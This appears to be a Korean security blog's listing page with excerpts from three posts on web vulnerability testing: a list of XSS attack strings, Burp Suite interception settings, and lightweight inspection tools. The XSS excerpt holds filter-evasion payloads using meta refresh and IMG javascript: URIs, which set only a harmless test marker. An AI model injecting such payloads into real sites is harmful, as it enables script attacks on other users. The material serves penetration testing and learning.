XSS 공격 문자열

XSS 문자열은 다음과 같다 <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT> <SCRIPT>document.Vulnerable=true;</script> <IMG SRC="jav ascript.document.vulerable=true;"> <IMG SRC="javascript:document.vulerable=true;"> <IMG SRC=" &#14;javascript:document.vulnerable=true;"> <BODY...

Continue reading

[웹 취약점] 버프스위트로 웹 취약점 분석 할 때, 설정 주의

버프스위트로 웹 취약점을 분석할 때, Request 패킷과 Response 패킷을 모두 분석 할 것이다. 그러기 위해서는 버프스위트 디폴스 설정 변경이 필요하다. 1. Proxy - Intercept Client Request Intercept Server Responses 의 intercept responses based on the following rules 기능을 활성화 할것이다. 그런데 이를 체크한다고 해서 모든 Response 패킷이 잡히는것은 아니다. 기본적으로 아래와 같이 되어 있으면 gif, jpg, png,...

Continue reading

[웹취약점] 쉽고 가벼운 웹 취약점 점검 툴

1. smsniff  송수신되는 중요 정보 암호화 확인을 위해 보통 wireshark 를 사용하는데, 이를 대체할 만한 툴이다. 암호화 통신을 확인하기에는 최적인 툴, 사용법이 쉽고 매우 간단함 2. acrodiff 파일 비교 프로그램이다. 웹 취약점 점검때에는 정상 응답값고 변조 후 응답값을 비교하는데 쓰인다. 바뀐 부분에 '하이라이트'로 강조됨으로써 한눈에 차이점을 확인 할 수 있다. ...

Continue reading